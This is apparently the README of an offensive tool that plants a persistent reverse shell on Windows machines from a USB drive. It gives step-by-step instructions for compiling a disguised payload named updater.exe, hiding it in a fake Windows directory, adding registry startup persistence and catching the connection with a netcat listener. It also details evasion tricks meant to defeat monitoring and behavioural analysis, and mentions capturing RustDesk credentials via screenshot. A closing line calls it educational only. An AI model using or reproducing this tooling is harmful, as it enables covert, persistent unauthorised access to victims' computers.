A USB-based deployment system that establishes a persistent reverse shell on Windows targets. With additional methods using RustDesk for GUI access.
This tool installs a payload (updater.exe) to a hidden directory (C:\Windows~\) and adds it to the Windows startup registry. Once installed, the payload automatically connects to a listener on each system boot, providing persistent remote access.
This reverse shell implements multiple evasion and stealth mechanisms to avoid detection on Windows systems. The payload hides its console window using Win32 API calls (ShowWindow and SetWindowLong) and modifies window styles to prevent it from appearing in the taskbar. It uses a global mutex (WindowsUpdateService) to prevent multiple instances from running simultaneously, which reduces suspicious process behavior. The code incorporates random delays (0-60 seconds on startup, 30-90 seconds between reconnection attempts) to avoid predictable network patterns that could trigger behavioral analysis tools. It also lowers its process priority to BelowNormal to minimize CPU usage spikes that might alert monitoring software. The shell runs on a background thread and automatically reconnects to the listener if the connection drops, providing persistent access across network interruptions. Configuration details (IP and port) are loaded from an external .env file rather than being hardcoded, making static analysis more difficult and allowing the payload to be reconfigured without recompilation.
- install.vbs - VBScript that deploys the payload and configures persistence (
install.vbs) - updater.exe - Compiled reverse shell payload (from
shell.cs) - shell.cs - C# source code for the reverse shell
in your own directory create a .env file wwith the variables
localIP - this is the ip that the payload will try to attatch itself to. This dosent need to be local. if your ip is wrong your listener wont work myPORT - this is the port you will also use for your listener once again if its wrong your listener wont work. (for example 4444)
On your Debian/Linux machine, compile the C# reverse shell into a Windows executable:
mcs -target:winexe shell.cs -out:updater.exeNote: The
-target:winexeflag is critical - it prevents a visible command prompt window from appearing on the target machine.
Transfer both files to your USB drive:
cp install.vbs /media/ep/6197-1B82/
cp updater.exe /media/ep/6197-1B82/Note: Adjust the USB mount path (
/media/ep/6197-1B82/) to match your system.
Insert the USB into the target machine and run install.vbs. This will:
- Create the hidden directory
C:\Windows~\ - Copy
updater.exeto the hidden directory - Add the payload to the Windows startup registry
- Execute the payload immediately
!! All you need to do on the target machine is run the install.vbs file !!
On your Debian/Linux machine, start a netcat listener:
nc -lvnp YOURPORT-example 4444- The payload connects back to your listener on your selected port which you used in your env file to compile
- Connection is re-established automatically on every system reboot
- If the listener is offline, the payload will retry on next boot
The installer adds the payload to the Windows startup registry, ensuring it runs automatically when the target machine starts. This provides persistent access even after:
- System reboots
- User logouts
- Temporary network disconnections
For GUI access, see the RustDesk integration guide which explains how to capture RustDesk credentials via screenshot.
This tool is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Always obtain explicit permission before testing.